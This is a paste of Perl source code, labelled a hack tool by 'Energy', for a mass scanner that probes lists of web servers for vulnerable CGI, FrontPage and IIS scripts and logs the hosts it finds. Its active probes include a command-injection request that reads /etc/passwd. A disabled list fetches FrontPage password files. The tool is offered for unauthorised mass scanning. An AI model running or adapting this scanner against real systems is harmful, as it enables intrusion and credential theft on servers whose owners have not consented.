FlyFar

HackTool. Perl. Energy. a - Source Code

Mar 10th, 2023
  3. @scripts_w = ("GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd HTTP/1.0\n\n",
  4. "GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
  5. "GET /article.php HTTP/1.0\n\n",
  6. "GET /_vti_bin/shtml.exe HTTP/1.0\n\n",
  7. "GET /msadc/samples/adctest.asp HTTP/1.0\n\n");
  8.  
  9. @names_w = ("/cgi-bin",
  10. "/_vti_bin",
  11. "/article",
  12. "/_vti_bin",
  13. "/Webdist",
  14. "/msadc.pl",
  15. "/RDS");
  16.  
  17.  
  18. ######### Fast Scan - script must be edited in sub version if it is to be used ##########
  19. @scripts_u = ("GET /_vti_inf.html HTTP/1.0\n\n","GET /_vti_pvt/service.pwd HTTP/1.0\n\n",
  20. "GET /_vti_pvt/users.pwd HTTP/1.0\n\n","GET /_vti_pvt/authors.pwd HTTP/1.0\n\n",
  21. "GET /_vti_pvt/administrators.pwd HTTP/1.0\n\n","GET /_vti_bin/shtml.dll HTTP/1.0\n\n",
  22. "GET /_vti_bin/shtml.exe HTTP/1.0\n\n","GET /cgi-dos/args.bat HTTP/1.0\n\n",
  23. "GET /cgi-win/uploader.exe HTTP/1.0\n\n","GET /cgi-bin/rguest.exe HTTP/1.0\n\n",
  24. "GET /cgi-bin/wguest.exe HTTP/1.0\n\n","GET /scripts/issadmin/bdir.htr HTTP/1.0\n\n",
  25. "GET /scripts/CGImail.exe HTTP/1.0\n\n","GET /scripts/tools/newdsn.exe HTTP/1.0\n\n",
  26. "GET /scripts/fpcount.exe HTTP/1.0\n\n","GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n",
  27. "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n","GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n",
  28. "GET /cfdocs/expelval/sendmail.cfm HTTP/1.0\n\n","GET /iissamples/exair/howitworks/codebrws.asp HTTP/1.0\n\n",
  29. "GET /iissamples/sdk/asp/docs/codebrws.asp HTTP/1.0\n\n","GET /msads/Samples/SELECTOR/showcode.asp HTTP/1.0\n\n",
  30. "GET /search97.vts HTTP/1.0\n\n","GET /carbo.dll HTTP/1.0\n\n");
  31. @names_u = ("_vti_inf.html   ","service.pwd     ","users.pwd       ","authors.pwd     ","administrators  ",
  32. "shtml.dll       ","shtml.exe       ","args.bat        ","uploader.exe    ","rguest.exe      ",
  33. "wguest.exe      ","bdir - samples  ","CGImail.exe     ","newdsn.exe      ","fpcount.exe     ",
  34. "openfile.cfm    ","exprcalc.cfm    ","dispopenedfile  ","sendmail.cfm    ","codebrws.asp    ",
  35. "codebrws.asp 2  ","showcode.asp    ","search97.vts    ","carbo.dll       ");
  36. ############################# Above code not used ###########################################
  37.  
  38.  
  39. ###############################################################
  40.  $insecure = 0;
  41. system "clear";
  42. print "\n                Energy PHP Fast Scanner \n\n";
  43. use IO::Socket;
  44. my ($port, $sock,$server);
  45. $size=0;
  46. ################################ SCAN ##########################
  47. if(! $ARGV[0])
  48. {
  49.  &usage;
  50.  exit;
  51. }
  52.  
  53. $port = $ARGV[2];
  54. if(! $ARGV[2]) { $port = 80; }
  55.  
  56. open (HOSTFILE, "$ARGV[0]");
  57. @hostfile = <HOSTFILE>;
  58. chop(@hostfile);
  59. $hostlength = @hostfile;
  60. $hostcount = 0;
  61.  
  62. while ($hostcount < $hostlength) {
  63.         print ("working on @hostfile[$hostcount]...\n");
  64. $server = (@hostfile[$hostcount]);
  65.         &connect;
  66.         $hostcount++;
  67.          }
  68.  
  69.  
  70. print "Scanner dropper \n";
  71.  
  72. ##########################################################
  73. sub connect {
  74.         #print "[Trying $server]\n";
  75.     $sock = IO::Socket::INET->new(PeerAddr => $server,
  76.                     PeerPort => $port,
  77.                     Proto => 'tcp');
  78.     if ($sock)  {
  79.         print "[Connected to $server on $port]\n";
  80.             $n=0;
  81.             &version;
  82.         close(sock);
  83.           $size++;
  84.       } else {
  85.    
  86.     }
  87. }
  88.  
  89. ###########################################################
  90. sub version {
  91.  $ver = "HEAD / HTTP/1.0\n\n";
  92.   my($iaddr,$paddr,$proto);
  93. $iaddr = inet_aton($server) || die "Error: $!";
  94. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  95. $proto = getprotobyname('tcp') || die "Error: $!";
  96. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error: $!";
  97. connect(SOCK, $paddr) || die "Error: $!";
  98. send(SOCK, $ver, 0) || die "Can't to send packet: $!";
  99.  
  100. # I do believe this should be taken out-------------------------
  101. # However unhash below to activate interactive optional deep mode.
  102.  
  103. # print "[Server version is]:\n[##############################]\n";
  104. # while(<SOCK>)
  105. # {
  106. # print;
  107. # }
  108. # print "[##############################]\n";
  109. #  print "Would you like normal or deep scan?\n [Normal-1, Deep-2, or Quit-3]:";
  110. # $n=0;
  111. # chomp($type=<STDIN>);
  112.  
  113. # Note if above is unhashed these two lines must be hashed.
  114. $n=0;
  115. $type=1;
  116.  
  117.  
  118. if($type eq 3)
  119.  { print "Scan aborted!\n"; exit; }
  120.  if($type eq 1)
  121.   {
  122.   foreach $scripts_w(@scripts_w)
  123. {
  124.     print "Searching for @names_w[$n] : ";
  125.     $scw=$scripts_w;
  126.       $name = @names_w[$n];
  127.     &win_scan;
  128.     $n++;
  129. }  
  130.   }
  131.  else {
  132.  
  133.  
  134. foreach $scripts_u(@scripts_u)
  135. {
  136.     print "Searching for [@names_u[$n]] : ";
  137.     $sc=$scripts_u;
  138.       $name = @names_u[$n];
  139.     &win2_scan;
  140.     $n++;
  141. }
  142.   }
  143. close(SOCK);
  144. }
  145. #################################################################
  146. sub win_scan {
  147. my($iaddr,$paddr,$proto);
  148. $iaddr = inet_aton($server) || die "Error: $!";
  149. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  150. $proto = getprotobyname('tcp') || die "Error: $!";
  151. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
  152. connect(SOCK, $paddr) || &error("Unable to connect: $!");
  153. send(SOCK,$scw,0);
  154.  
  155.     $check=<SOCK>;
  156.     ($http,$code,$blah) = split(/ /,$check);
  157.     if($code == 200)
  158.     {
  159.        
  160.                 print "[Found!]\n";
  161.         open (OUT, ">>$ARGV[1]");
  162.                 print OUT ("$server - [@names_w[$n]] \n");
  163.                 close (OUT);
  164.                 $insecure++;
  165.     }
  166.     else
  167.     {
  168.         print "[Not Found]\n";
  169.  
  170.     }
  171.     close(SOCK);
  172. }
  173.  
  174. ###############################################################
  175. sub win2_scan {
  176.  
  177.  my($iaddr,$paddr,$proto);
  178. $iaddr = inet_aton($server) || die "Error: $!";
  179. $paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
  180. $proto = getprotobyname('tcp') || die "Error: $!";
  181. socket(SOCK, PF_INET, SOCK_STREAM, $proto) || &error("Failed to open socket: $!");
  182. connect(SOCK, $paddr) || &error("Unable to connect: $!");
  183. send(SOCK,$sc,0);
  184.  
  185.     $check=<SOCK>;
  186.     ($http,$code,$blah) = split(/ /,$check);
  187.     if($code == 200)
  188.     {
  189.         print "[Found!]\n";
  190.         $insecure++;
  191.     }
  192.     else
  193.     {
  194.         print "[Not Found]\n";
  195.  
  196.     }
  197.     close(SOCK);
  198. }
  199.  
  200. ################################ USAGE ##########################
  201. sub usage {
  202.         system "clear";
  203.         print "\n\n\n          Fast Scanner   \n\n";
  204.        print "                   || by Energy ||  \n\n";
  205.         print "Used to mass scan Windows,IRIX and Linux b0x\n\n";
  206.     print "Usage: perl usdl.pl hostlist.txt logfile.txt [porta]\n\n";
  207.     exit(0); }
  208. ################################ END   ##########################
  209. print "[Test $size hosts $port e $insecure sites vulnerable]\n";
  210.  